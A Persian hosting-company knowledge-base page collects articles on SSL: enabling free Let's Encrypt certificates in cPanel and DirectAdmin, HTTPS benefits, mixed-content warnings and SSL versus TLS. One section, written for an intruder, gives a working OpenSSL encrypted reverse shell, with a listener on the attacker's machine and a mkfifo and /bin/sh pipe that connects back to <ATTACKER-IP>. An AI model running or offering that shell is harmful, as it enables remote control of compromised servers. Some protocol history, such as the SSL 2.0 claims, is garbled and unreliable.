روش فعال سازی گواهینامه SSL رایگان در هاست سی پنل

کاربران Cpanel می توانند از این سرویس که به عنوان یک پلاگین در Cpanel آنها موجود می باشد به صورت زیر گواهینامه SSL را برای دامنه ها و ساب دامنه های خود فعال نمایند

1- ابتدا به Cpanel خود وارد شوید و در بخش Security روی گزینه Let’s Encrypt SSL کلیک نمایید.

1 2

2- در صفحه بعد تمامی دامنه ها و ساب دامنه های فعال شما نشان داده خواهند شد. دامنه و یا ساب دامنه مورد نظر خود را انتخاب کرده سپس روی لینک Issue کلیک نمایید.

2 1

3- در صفحه بعد گزینه Include را انتخاب کنید . در صورتی که تمایل دارید SSL بر روی ساب دامنه ها هم فعال شود تیک گزینه Add cPanel subdomains را نیز فعال کرده و روی گزینه Issue کلیک کنید .

3

از این پس می توانید به جای استفاده از http://site.com از https://site.com استفاده نمایید.

شل معکوس با استفاده از OpenSSL

یکی از دسترسی هایی که نفوذگر بعد از دسترسی به سرور از طریق وب یا … نیاز دارد ، دسترسی به Shell است .

بدین طریق میتوان از ابزار openssl که بر روی سرور های لینوکسی به طور پیشفرض نصب است استفاده کنید

پس ابتدا کلید را میسازیم :

 

[email protected]# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

 

حال اقدام به Listen میکنیم ( روی ماشین نفوذگر )  :

openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>

 

در آخر از طریق سرور مقصد برای اتصال بصورت معکوس به ماشین اقدام میکنیم :

 

[email protected]#: mkfifo /tmp/s; /bin/sh
-i < /tmp/s 2>&1 | openssl s_client -quiet -connect
<ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s

 

مزایای بهره گیری از گواهی‌های SSL

Secure Socket Layer یا همان SSL، یک تکنولوژی استاندارد و به ثبت رسیده برای تأمین ارتباطی امن بین یک وب سرور و یک مرورگر اینترنت است. این ارتباط امن از تمامی اطلاعاتی که ما بین وب سرور و مرورگر اینترنت (کاربر) انتقال می یابد، محافظت می کند تا این داده ها به صورت محرمانه و دست نخورده باقی بماند.

SSL یک استاندارد فنی است و توسط میلیونها وب سایت در سراسر جهان برای برقراری امنیت انتقال اطلاعات استفاده می شود.برای اینکه یک وب سایت بتواند ارتباطی امن داشته باشد نیاز به یک گواهینامه SSL دارد .

پروتکل Socket Secure Layer ، یک استاندارد وب برای کدکردن اطلاعات بین کاربر و وب سایت است. اطلاعاتی که توسط یک اتصال SSL مبادله می شوند بصورت کد شده ارسال می شوند و بدین ترتیب اطلاعات مبادله شده از دزدیده شدن یا استراق سمع محافظت می شوند. گواهینامه SSL برای شرکتها و مشتریان این امکان را فراهم می کند که بتوانند با اطمینان اطلاعات خصوصی شان را مانند شماره کارت اعتباری، به یک وب سایت بطور محرمانه ارسال کنند. برای برقراری یک اتصال SSL به Web Server Certificateها نیاز می باشد. گواهینامه های SSL انواع گوناگونی دارد مانند صدور گواهینامه SSL فقط برای یک دامنه یا زیر دامنه (sub domain) ، صدور گواهینامه SSL برای یک دامنه و کلیه زیر دامنه ها (sub domains) انجام میشود .

وقتی شما از گواهی SSL استفاده می‌کنید، این پیام روشن را به کاربرانتان می‌دهید که ما مراقب ایمنی شما هستیم و سایت ما مورد اعتماد است. با این وجود تمام گواهی‌های SSL از لحاظ سطح امنیتی موقعیت یکسانی ندارند. هنگامی که قصد خرید SSL را دارید باید از اعتبار، قابل اعتماد بودن و حسن شهرت شرکت ارائه دهنده اطمینان حاصل فرمایید

گوگل رتبه بندی سایت های امن را افزایش می دهد

گوگل از افزایش رتبه بندی سایت های امن HTTPS / SSL خبر داد و گفت در نظر دارد با اضافه کردن یک گواهی کلید 2048 بیتی توسط مالکان وب سایت ها، رتبه آن ها را مقداری افزایش دهد.

گوگل گفت این مسئله باعث خواهد شد که مقداری تاثیر مثبت در افزایش رتبه بندی این گونه سایت ها اعمال شود. در حقیقت  اضافه کردن این کلید در سایت های HTTPS / SLL باعث تاثیر در الگوریتم رتبه بندی گوگل خواهد شد البته شایان ذکر است این تاثیر به اندازه محتوای خوب برای وب سایت نخواهد بود. بر اساس آزمون هایی که گوگل انجام داده است تاثیر گذاری این مسئله را بطور کلی کمتر از 1 درصد دانست ولی گفت گوگل در نظر دارد مالکان وب سایت ها را تشویق کند که از HTTP به سمت HTTPS سوئیچ کنند و امنیت سایت های خود را افزایش دهند.

تفاوت عمده دو پروتکل  http  و https

  • مهمترین تفاوت میان http با https امنیت و حفظ اطلاعات مربوط به شماست .
  • http  روی پورت 80 کار می کند ، اما https روی پورت 443 .
  • در //:https اطلاعات ابتدا به کد تبدیل شده و به سرور ارسال می‌گردد. سپس این کد در سرور رمز گشایی شده و به زبان قابل فهم بر می‌گردد. این کار مقداری زمان بر بوده و بنابراین سرعت //:https از سرعت //:http کمتر است .
  •  فیلتر شکنها و سایتهایی که با ssl کار می کنند قابل فیلتر شدن نیستند ( به دلیل طرز کار ssl ) ، مگر اینکه IP آنها را مستقیما از داخل روتر و یا سیستم فیلترینگ بلاک کنند که چنین چیزی کمتر اتفاق می افتد .
پس از چندین ماه تلاش و پی گیری های مداوم تیم تخصصی مارال هاست خرسندیم به اطلاع شما کاربران گرامی برسانیم از این پس بدون هیچ گونه محدودیت و پرداخت هزینه می توانید روی وب سایت خود گواهینامه SSL نصب نموده و امنیت وب سایت خود را ارتقا دهید .این سرویس برای کلیه سرویس های […]&url=https%3A%2F%2Fwww.maralhost.com%2Fkb%2F%25d8%25b1%25d9%2588%25d8%25b4-%25d9%2581%25d8%25b9%25d8%25a7%25d9%2584-%25d8%25b3%25d8%25a7%25d8%25b2%25db%258c-%25da%25af%25d9%2588%25d8%25a7%25d9%2587%25db%258c%25d9%2586%25d8%25a7%25d9%2585%25d9%2587-ssl-%25d8%25b1%25d8%25a7%25db%258c%25da%25af%25d8%25a7%25d9%2586-%25d9%2585%25d8%25a7%25d8%25b1%25d8%25a7%25d9%2584%2F">

روش فعال سازی گواهینامه SSL رایگان مارال هاست

پس از چندین ماه تلاش و پی گیری های مداوم تیم تخصصی مارال هاست خرسندیم به اطلاع شما کاربران گرامی برسانیم از این پس بدون هیچ گونه محدودیت و پرداخت هزینه می توانید روی وب سایت خود گواهینامه SSL نصب نموده و امنیت وب سایت خود را ارتقا دهید .این سرویس برای کلیه سرویس های میزبانی وب مارال هاست رایگان می باشد

در اکثر مرورگرها سایت ایمن را با https و قفلی در آدرس بار میشناسیم. ترافیک رمزنگاری نشده خطرات امنیتی به همراه داشته و مثلا هکری میتواند به ترافیک وب یک کاربر که به یک هات اسپات وای فای کانکت میشود دست یافته و داده های حساس وی را برباید.

شما با نصب گواهینامه SSL روی وب سایت خود می توانید سطح امنیت وب سایت خود را تا حد زیادی بالا ببرید ، گواهینامه ارائه شده مارال هاست از ریشه متعلق به ISRG توسط مرجع صدور گواهی IdenTrust تائید میشود. گواهیهای ISRG توسط در تمام مرورگرها شناخته و پذیرفته خواهند شد.

شرکتهای تکنولوژیکی چون گوگل و یاهو وفیسبوک نیز استفاده گسترده تر از رمزنگاری را بخصوص برای دور زدن برنامه های کنترلی که توسط دولتها ایجاد شده اند و همچنین برای محافظت از مجرمین سایبری بیش از پیش فعال تشویق می نمایند.

 روش فعال سازی گواهینامه برای کاربرانسی پنل

 

کاربران Cpanel می توانند از این سرویس که به عنوان یک پلاگین در Cpanel آنها موجود می باشد به صورت زیر گواهینامه SSL را برای دامنه ها و ساب دامنه های خود فعال نمایند.

1- ابتدا به Cpanel خود وارد شوید و در بخش Security روی گزینه Let’s Encrypt SSL کلیک نمایید.

maralhost ssl3

2- در صفحه بعد تمامی دامنه ها و ساب دامنه های فعال شما نشان داده خواهند شد. دامنه و یا ساب دامنه مورد نظر خود را انتخاب کرده سپس روی لینک Issue کلیک نمایید.

maralhost ssl4

3- در صفحه بعد گزینه Include را انتخاب کنید و در صورتی که می خواهید برای سرویس ایمیل خود نیز این گواهینامه را فعال کنید روی گزینه Install mail SMTPS/POP3S/IMAPS SSL certificate کلیک نمایید تا انتخاب شود. سپس روی دکمه Issue کلیک نمایید.

maralhost ssl5

4- در این مرحله اندکی صبر کنید تا سرور شما گواهینامه را از سرور مقصد دریافت نماید. در صورت موفقیت آمیز بودن این مرحله پیغام زیر به شما نمایش داده می شود.

maralhost ssl6

از این پس می توانید به جای استفاده از http://site.com از https://site.com استفاده نمایید.

maralhost ssl7

همانطور که در تصویر بالا مشاهده می کنید گواهینامه صادر شده از امنیت بسیار بالایی برخوردار می باشد.

روش فعال سازی گواهینامه برای کاربران دایرکت ادمین

 

وارد پنل دامین خود شوید و طبق تصویر زیر در پایین صفحه روی گزینه SSL Certificates کلیک نمایید.

ssl1

در صفحه بعد گزینه ی Use the server’s shared signed certificate انتخاب نموده و از موارد مربوطه Free & automatic certificate from Let’s Encrypt را تیک بزنید.

ssl2

در ادامه اطلاعات مورد نیاز را وارد نموده و دکمه ی ذخیره را کلیک کنید.

ssl3

پس از برقراری ارتباط با سرور مقصد و دریافت گواهینامه ، پیغام زیر به شما نمایش داده خواهد شد.

ssl4

SSL که Secure Socket Layer و یک استاندارد به ثبت رسیده برای تأمین ارتباطی امن بین یک وب سرور و یک مرورگر اینترنت است. این ارتباط امن از تمامی اطلاعاتی که بین وب سرور و مرورگر اینترنت (کاربر) انتقال می‌یابد، محافظت می‌کند تا این داده‌ها به صورت محرمانه و دست نخورده باقی بمانند. جهت آشنایی […]&url=https%3A%2F%2Fwww.maralhost.com%2Fkb%2F%25d9%2585%25d8%25b4%25da%25a9%25d9%2584-%25d9%2582%25d9%2581%25d9%2584-%25d8%25a8%25d8%25a7-%25d8%25a7%25d8%25ae%25d8%25b7%25d8%25a7%25d8%25b1-%25d8%25b2%25d8%25b1%25d8%25af-%25d8%25b1%25d9%2586%25da%25af-%25da%25af%25d9%2588%25d8%25a7%25d9%2587%25db%258c%25d9%2586%25d8%25a7%25d9%2585%25d9%2587-ssl%2F">

مشکل قفل با اخطار زرد رنگ گواهینامه SSL

SSL که Secure Socket Layer و یک استاندارد به ثبت رسیده برای تأمین ارتباطی امن بین یک وب سرور و یک مرورگر اینترنت است. این ارتباط امن از تمامی اطلاعاتی که بین وب سرور و مرورگر اینترنت (کاربر) انتقال می‌یابد، محافظت می‌کند تا این داده‌ها به صورت محرمانه و دست نخورده باقی بمانند. جهت آشنایی بیشتر با SSL و نحوه HTTPS شدن سایت این مقاله را بررسی نمائید. ممکن است بعد از نصب گواهینامه SSL و تبدیل وبسایت از http به https در مرورگر روی قفل کنار آدرس سایت یک مثلث زرد رنگ کوچک مشاهده کنید. این مثلث یک نوع خطای SSL است و معمولاً در مرورگر Chrome نمایش داده می‌شود و در مرورگرهایی مانند فایرفاکس، اوپرا و اینترنت اکسپلورر مشاهده نخواهید کرد. در این مقاله دلایل اخطار زرد رنگ گواهینامه SSL و نحوه رفع آن را به شما آموزش خواهیم داد.

همانطور که در این لینک توضیح داده شده است HTTPS یک پروتکل امنیتی می‌باشد که در اصل وظیفه آن رمزنگاری اطلاعات کاربران در هنگام تبادل اطلاعات با سرور می‌باشد. هنگام فعال کردن HTTPS این پروتکل دیگر اجازه دخالت به پروتکل ناامن HTTP را نخواهد داد و هر صفحه ای که دارای این پروتکل ناامن باشد را با علامت هشدار زرد رنگ نشان خواهد داد. در واقع توضیح این خطای SSL این است که این صفحه دارای گواهی امنیت SSL می‌باشد اما دارای محتواهای دیگری است که ناامن هستند و این صفحه را ناامن کرده‌اند.

این علامت هشدار در مرورگرهای مختلف به شکل های گوناگون نمایش داده خواهد شد در مرورگر کروم و فایرفاکس به یکی از شکل‌های زیر خواهد بود:

ssl error

 

 

SSL Error

 

دلایل به وجود امدن این مشکل :

مشکل خطای زرد رنگ گواهینامه SSL معمولاً به علت مشکلات زیر می‌باشد:

  •  الگوریتم‌های رمزنگاری از نسخه SHA1 به SHA2 تغییر یافته اند بنابراین مرورگرها هنگام بررسی گواهینامه SSL انتظار دارند سایت شما دارای الگوریتم SSL جدید باشد و در صورتی قدیمی بودن گواهینامه SSL  علامت اخطار مثلث زرد رنگ روی قفل نمایش داده می‌شود البته احتمال رخداد این مورد بسیار کم است  به علت اینکه sslهای روی الگوریتم جدید ساخته می شود.
  • این خطا معمولاً به دلیل عدم تایید امن بودن صفحه سایت شما ، توسط مرورگر می‌باشد. مرورگر صفحه را بررسی می‌کند و علی رغم نصب بودن گواهینامه SSL و فعال بودن https و داشتن قفل، صفحه را ایمن نمی داند که در این حالت موارد زیر باید بررسی شوند:
  1. مطمئن شوید تمام لینک‌های خارجی که در سایت‌تان فراخوانی کرده‌اید، بصورت HTTPS هستند و فراخوانی‌ها بصورت HTTP نباشند. توجه داشته باشید که این فراخوانی‌ها شامل تمام موارد مانند عکس‌ها، ویدئوها، فونت‌ها و … می‌شوند.
  2. تمامی لینک‌های داخلی مانند عکس‌هایی که از سایت خودتان لینک دادید باید با HTTPS شروع شوند.
  3. تمامی ویجت‌هایی را که از HTTP استفاده می‌کنند، بلاک کنید.
  4. آدرس دهی تمام کدها مانند cssها، jsها، phpها و … باید با HTTPS باشند.

بعنوان یک راهکار ساده می‌توانید source code را باز کنید و HTTP را سرچ کنید. بعد از رفع تمامی این موارد، اگر گواهینامه شما از نوع DV باشد که مخفف نوع Domain Validation SSL Certificate است قفل کنار آدرس سیاه رنگ خواهد شد و اگر از نوع EV باشد  که مخفف Extended Validated SSL Certificate  است قفل سبز رنگ خواهد شد.

نکته : اگر از تصاویر، فیلم‌ها یا کدهایی از سایت دیگری که HTTPS نیست در سایت‌تان استفاده می‌کنید، آن‌ها را از سایت مقصد دانلود و سپس در هاست خود آپلود نمائید و یک لینک داخلی HTTPS از آن محتوا در کدهای خود جایگزین کنید.

تفاوت پروتکل های SSL و TLS

L یا همان لایه ی امن سوکت، و مخفف عبارت انگلیسی Secure Sockets Layer ، پروتکلیست رمزنگاری شده که ارتباط ایمن بین سرویس گیرنده و سرویس دهنده را امکان پذیر میکند. SSL توسط نت اسکیپ توسعه داده شد و در 1995 با عنوان SSL 2.0 به دنیای وب معرفی گردید. درست یک سال بعد در 1996 نسخه شماره 3.0 آن عرضه شد ولی در حال حاضرمرورگرها از نسخه 2.0 آن پشتیبانی می کنند. لازم به ذکر است که SSL می تواند برای امن کردن پروتکل های FTP و SMTP هم مورد استفاده قرار بگیرد.

حال در تعریف TLS که به معنای امنیت لایه انتقال و مخفف عبارت Transport Layer Security می باشد، باید بگوییم که در حقیقت نسل بعدی SSL می باشد که نسخه 1.0 آن در سال 1999 بر پایه SSL 2.0 عرضه شد.

TLS این امکان را دارد که در صورت نیاز، ارتباط کاربر از TLS 1.0 بهSSL 2.0 کاهش بیابد.

نسخه های بعدی TLS که به عبارتی نسخه های 1.1 و 1.2 هستند به ترتیب در سال های 2006 و 2008 به دنیای وب عرضه شدند و مرورگر های کنونی در حالت پیش فرض از 1.0 پشتیبانی می کنند.

یک تفاوت در SSL و TLS این است که از لحاظ رمزنگاری با یکدیگر متفاوت هستند. در واقع در ورژن های قدیمی SSL این مورد بیشتر خودنمایی می کند.

SSL و TLS فقط در روش handshake (برقراری ارتباط) میان سرور و کاربر تفاوت دارند. این ارتباط به خودی خود باعث رمزنگاری اطلاعات نیست، بلکه این دو (سرویس دهنده و سرویس گیرنده) از طریق این دو، بر روی روش رمزنگاری توافق می کنند.

از SSL استفاده کنیم یا از TLS

همانطور که در بالا اشاره شد، از آنجا که TLS از SSL بروزتر است، استفاده از آن برای ایجاد یک ارتباط امن، منطقی تر به نظر میرسد اما به دلیل اینکه مرورگر ها با SSL سازگاری بهتری دارند، در حال حاضر استفاده از گواهینامه SSL همچنان در فضای اینترنت معمولتر است.

SSL و TLS چگونه کار می کنند؟

TLS و SSL یک ارتباط دو طرفه امن وو تونل مانند بین سرویس دهنده و سرویس گیرنده ایجاد می کنند که برای انتقال داده و اطلاعات از آن استفاده می شود. اطلاعات رد و بدل شده در حالت عادی از بستر HTTP استفاده می کنند اما زمانی که SSL یا TLS استفاده می شود، این اطلاعات از بستر پورتکل انتقال اطلاعات HTTPS بهره مند می شوند.

 

SSL به چه معناست؟

 

کلمه SSL مخفف عبارت Secure Socket Layer به معنای “لایه امن پروتکل” است

SSL  در اصطلاح به سیستم امن و رمزی انتقال داده اطلاق می شود، ssl را ابتدا  در تاریخ ۱۹۹۶ میلادی شرکت Netscape به منظور نقل و انتقال امن و رمزی اطلاعات ایجاد نمود و اکنون تقریبا تمام مرورگرهای استاندارد از جمله فایر فاکس، اینترنت اکسپلورر، اپرا، گوگل کروم و سافاری آن را پشتیبانی می کنند؛ همچنین در این رابطه شرکتهایی وجود دارند که گواهی ssl  ارائه می کنند.

 SSL یک پروتکل استاندارد و رایج امنیتی برپایه رمزگذاری است که در آن داده‌های رد و بدل شده بین سرویس دهنده (Server) و سرویس گیرنده (Client) توسط کلیدهای خاصی خصوصی و عمومی رمزنگاری (Encrypt) شده و در سمت دیگر رمزگشایی (Decrypt) می‌شود. امنیت در این پروتکل دو طرفه است؛ یعنی در هر دو طرف، فرایند رمزنگاری و رمزگشایی انجام می‌گیرد.

بسیاری از سرویس دهندگانی که اطلاعات و داده‌های حساس مانند اطلاعات کارت‌های بانکی (مثلاً در شبکه بانکی کشور)، کارت‌های شناسایی، رمزهای عبور مهم و … را بین خود و سرویس گیرنده رد و بدل می‌کنند، از پروتکل‌های امنیتی مانند SSL استفاده می‌کنند.

وبسایت‌هایی که از پروتکل امن SSL جهت رمزگذاری داده‌ها استفاده می‌کنند، معمولاً از طریق پروتکل HTTPS (به جای حالت عادی و غیر امن آن یعنی HTTP) با سرویس گیرنده‌ها ارتباط برقرار می‌کنند. در مرورگرها، اینگونه وبسایت‌ها معمولاً با علامت قفل سبز (به معنای ارتباط امن سالم) نشان داده می‌شوند:

همان طور که می دانیم، اطلاعاتی که به طور معمول در صفحات وب رد و بدل می شوند در بستر پروتکل HTTP یا  Hyper Text Transfer Protocol  انتقال می یابند، این پروتکل استانداردی تعریف شده است که با آن متن ساده یا plain text  را منتقل می کنند، از طرفی این داده ها به دلیل رمزنگاری نشدن، برای افراد سوم شخص قابل خواندن هستند، مثلا اگر پسورد خود را در بستر این پروتکل به سروری منتقل کنید، ممکن است از طریق سرویس دهنده اینترنت، قابل روئیت باشد (با استفاده از برنامه هایی تحت عنوان sniffer)، لذا http از لحاظ امنیتی برای کارهایی که به اطلاعات حساس از جمله حسابهای بانکی و رمزهای مشتریان مربوط می شود اصلا مناسب نیست، از این رو بانک ها و فروشگاههای اینترنتی و در کل سایتهایی که امنیت کاربران برایشان اهمیت زیادی دارد، از پروتکلی دیگر به نام HTTPS یا Hyper Text Transfer Protocol Secure بدین منظور استفاده می کنند.

پروتکل HTTPS چیست و چه فرقی با HTTP دارد؟

HTTPS  پروتکلی است که در بستر آن امکان رمزنگاری (encrypt) اطلاعات فراهم می شود، به لحاظ تخصصی در HTTP پورت ۸۰ مورد استفاده قرار می گیرد، در حالی که در HTTPS این پورت ۴۴۳ است؛ از طرفی همانطور که گفتیم در HTTP داده ها به صورت متن ساده یا plain text هستند اما در HTTPS رمزنگاری داده ها به وسیله SSL انجام می شود.

پروتکل امنیتی (SSL) یکی از پروتکل‌های استاندارد جهت انتقال داده‌ها بین سرویس دهنده (Server) و سرویس گیرنده (Client) به صورت رمزنگاری شده است.

شیوه رمزنگاری اطلاعات در ssl به چه صورت است؟

پس از برقراری اتصال امن، ssl  اطلاعات را به وسیله دو کلید رمزنگاری می کند، کلید عمومی برای اشخاص سوم شخص قابل خواندن است اما کلید دوم تنها توسط ارسال کننده و دریافت کننده داده، قابل استفاده است.

چگونه از استفاده کردن یک سایت از پروتکل امن اطمینان حاصل کنیم؟

چند فاکتور در تعیین معتبر بودن گواهی یک سایت نقش دارند، اول از همه کلید کوچکی است که در مرورگرهای مختلف با کمی اختلاف در مکان و شکل، نشان داده می شود، برخی از مرورگرها در نسخه های جدید خود پس از برقراری یک اتصال امن، نوار آدرس را به رنگ سبز نیز نشان می دهند؛ فاکتور دیگر وجود عبارت https در ابتدای آدرس آن سایت است.

چرا در برخی از سایت ها، مرورگر تقاضای تایید اعتبار می کند؟

بعضا ممکن است با صفحاتی روبرو شده باشید که مرورگر نسبت به منقضی شدن اعتبار گواهی ارتباط امن آن، به شما هشدار دهد، این اتفاق به چند دلیل ممکن است رخ دهد، یکی اینکه گواهی آن سایت واقعا به پایان رسیده و تمدید نشده باشد، دوم اینکه تاریخ سیستم شما از زمان حقیقی، عقب تر یا حتی جلوتر باشد، دلیل سوم هم می تواند به مسائل فنی صفحه و ترکیب اشتباه داده های عادی با داده های رمزنگاری شده مربوط باشد که این عامل به مسائل فنی سایت ارتباط دارد.

چگونه برای سایت خود گواهی ssl تهیه کنیم؟

برای داشتن یک ارتباط امن در بستر HTTPS برای سایت خود، نیاز به گواهی معتبر ssl دارید، این گواهی از طریق نمایندگی ها و سرویس دهنده های هاست نیز قابل خریداری است، علاوه بر این به سروری با قابلیت پشتیانی از ssl و یک ip اختصاصی احتیاج خواهید داشت.